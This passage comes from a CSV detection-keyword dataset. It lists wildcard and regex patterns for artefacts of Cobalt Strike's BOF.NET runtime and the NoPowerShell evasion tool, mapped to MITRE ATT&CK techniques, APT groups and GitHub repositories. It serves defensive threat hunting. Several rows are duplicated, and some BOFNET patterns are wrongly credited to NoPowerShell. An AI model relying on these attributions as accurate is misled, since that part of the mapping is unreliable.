TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*BOFNET.Bofs*",".{0,1000}BOFNET\.Bofs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BOFNET.Bofs.Jobs*",".{0,1000}BOFNET\.Bofs\.Jobs.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet.cna*",".{0,1000}bofnet\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet.cna*",".{0,1000}bofnet\.cna.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*BOFNET.csproj*",".{0,1000}BOFNET\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BOFNET.dll*",".{0,1000}BOFNET\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*BOFNET.dll*",".{0,1000}BOFNET\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*BOFNET.sln*",".{0,1000}BOFNET\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_boo *.boo*",".{0,1000}bofnet_boo\s.{0,1000}\.boo.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_execute *",".{0,1000}bofnet_execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_execute *",".{0,1000}bofnet_execute\s.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.*",".{0,1000}bofnet_execute\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.*",".{0,1000}bofnet_execute\..{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_execute.cpp*",".{0,1000}bofnet_execute\.cpp.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.cpp.x64.obj*",".{0,1000}bofnet_execute\.cpp\.x64\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.cpp.x64.obj*",".{0,1000}bofnet_execute\.cpp\.x64\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.cpp.x86.obj*",".{0,1000}bofnet_execute\.cpp\.x86\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.cpp.x86.obj*",".{0,1000}bofnet_execute\.cpp\.x86\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_init*",".{0,1000}bofnet_init.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_job *",".{0,1000}bofnet_job\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_jobkill*",".{0,1000}bofnet_jobkill.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_jobs*",".{0,1000}bofnet_jobs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_jobstatus *",".{0,1000}bofnet_jobstatus\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_list*",".{0,1000}bofnet_list.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_listassembiles*",".{0,1000}bofnet_listassembiles.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 